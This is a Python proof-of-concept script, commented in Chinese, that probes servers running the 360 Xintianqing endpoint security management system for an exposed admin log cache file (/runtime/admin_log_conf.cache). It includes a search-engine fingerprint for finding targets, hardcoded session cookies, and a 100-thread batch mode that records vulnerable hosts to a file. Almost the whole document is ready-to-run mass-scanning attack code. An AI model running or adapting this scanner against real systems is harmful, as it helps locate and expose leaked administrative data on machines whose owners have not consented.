# 360 新天擎终端安全管理系统信息泄露漏洞
# title="360新天擎"

# 导包
import argparse,requests,sys,re
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

# 指纹模块
def banner():
    banner = '''
   _____ _____ ____     _____   ____________ 
  |__  // ___// __ \   /  _/ | / / ____/ __ \
   /_ </ __ \/ / / /   / //  |/ / /_  / / / /
 ___/ / /_/ / /_/ /  _/ // /|  / __/ / /_/ / 
/____/\____/\____/  /___/_/ |_/_/    \____/  
                                             
                                author:w
                                version:0.0.1
'''
    print(banner)
# poc模块
def poc(target):
    url = target + "/runtime/admin_log_conf.cache"
    headers = {
        "Cookie": "SKYLAR0e940cc04becd6d06ed08985da=coppmdr0vl1hflitre0u2qipm7; YII_CSRF_TOKEN=01c9f06e3507a0611edcef3268d62781836307dds%3A40%3A%22f37c7106016488e0945af3a70dfab70070e40008%22%3B",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Te": "trailers",
        "Connection": "close"
    }
    try:
        res = requests.get(url=url,headers=headers,verify=False,timeout=5)
        if res.status_code == 200:
            print("[+] 这个url存在信息泄露" + target)
            with open('360res.txt','a',encoding='utf-8') as f:
                f.write(target + "存在信息泄露\n")
        else:
            print("[-] 这个url不存在信息泄露")
    except:
        pass

# 主函数模块
def main():
    banner()
    '''命令行接收参数'''
    parse = argparse.ArgumentParser(description="这是360 新天擎终端安全管理系统信息泄露漏洞的poc")
    #  -u 单个检测   -f 批量检测
    parse.add_argument('-u','--url',dest='url',type=str,help="url")
    parse.add_argument('-f','--file',dest='file',type=str,help='url.txt')
    # 调用
    args = parse.parse_args()
    # 处理命令行参数
    # 判断是单个的url还是txt文件
    # 如果是单个url，直接利用poc
    if args.url and not args.file:
        poc(args.url)
    # 如果是文件，定义一个空列表，将txt文件中的url按行读取到url列表中
    elif not args.url and args.file:
        url_list = []
        with open(args.file,"r",encoding='utf-8') as f:
            for url in f.readlines():
                url_list.append(url.strip().replace("\n",""))
        # 定义线程池为100
        mp = Pool(100)
        # 将列表参数输入到poc中利用
        mp.map(poc,url_list)
        # 关闭线程池
        mp.close()
        mp.join()
    else:
        print("Usag:\n\t python3 {sys.argv[0]} -h")
# 主函数入口
if __name__ == '__main__':
    main()
